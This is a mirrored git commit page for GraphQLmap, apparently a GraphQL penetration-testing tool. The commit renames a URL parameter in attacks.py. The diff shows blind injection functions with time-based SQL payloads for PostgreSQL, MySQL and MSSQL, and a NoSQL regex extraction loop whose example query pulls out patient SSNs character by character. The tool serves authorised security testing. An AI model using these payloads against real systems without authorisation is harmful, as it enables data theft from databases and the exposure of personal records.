swisskyrepo
/
GraphQLmap
mirror of https://github.com/swisskyrepo/GraphQLmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Refractored various URL to url

pull/11/head
fuomag9 2020-02-05 13:12:24 +01:00
parent 7bda3f8097
commit 0701262cde
1 changed files with 11 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
attacks.py
View File

@ -139,34 +139,34 @@ def exec_advanced(URL, method, query, headers):
print(exec_graphql(URL, method, query, headers)) print(exec_graphql(URL, method, query, headers))
def blind_postgresql(URL, method, headers): def blind_postgresql(url, method, headers):
query = input("Query > ") query = input("Query > ")
payload = "1 AND pg_sleep(30) --" payload = "1 AND pg_sleep(30) --"
print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time())))) print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload) injected = (url.format(query)).replace("BLIND_PLACEHOLDER", payload)
r = requester(URL, method, injected, headers) r = requester(url, method, injected, headers)
print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time())))) print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
def blind_mysql(URL, method, headers): def blind_mysql(url, method, headers):
query = input("Query > ") query = input("Query > ")
payload = "'-SLEEP(30); #" payload = "'-SLEEP(30); #"
print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time())))) print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload) injected = (url.format(query)).replace("BLIND_PLACEHOLDER", payload)
r = requester(URL, method, injected, headers) r = requester(url, method, injected, headers)
print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time())))) print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
def blind_mssql(URL, method, headers): def blind_mssql(url, method, headers):
query = input("Query > ") query = input("Query > ")
payload = "'; WAITFOR DELAY '00:00:30';" payload = "'; WAITFOR DELAY '00:00:30';"
print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time())))) print("\033[92m[+] Started at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
injected = (URL.format(query)).replace("BLIND_PLACEHOLDER", payload) injected = (url.format(query)).replace("BLIND_PLACEHOLDER", payload)
r = requester(URL, method, injected, headers) r = requester(url, method, injected, headers)
print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time())))) print("\033[92m[+] Ended at: {}\033[0m".format(time.asctime(time.localtime(time.time()))))
def blind_nosql(URL, method, headers): def blind_nosql(url, method, headers):
# Query : {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} # Query : {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
# Check : "5d089c51dcab2d0032fdd08d" # Check : "5d089c51dcab2d0032fdd08d"
@ -179,7 +179,7 @@ def blind_nosql(URL, method, headers):
while len(data) != data_size: while len(data) != data_size:
for c in charset: for c in charset:
injected = query.replace("BLIND_PLACEHOLDER", data + c) injected = query.replace("BLIND_PLACEHOLDER", data + c)
r = requester(URL, method, injected, headers) r = requester(url, method, injected, headers)
if check in r.text: if check in r.text:
data += c data += c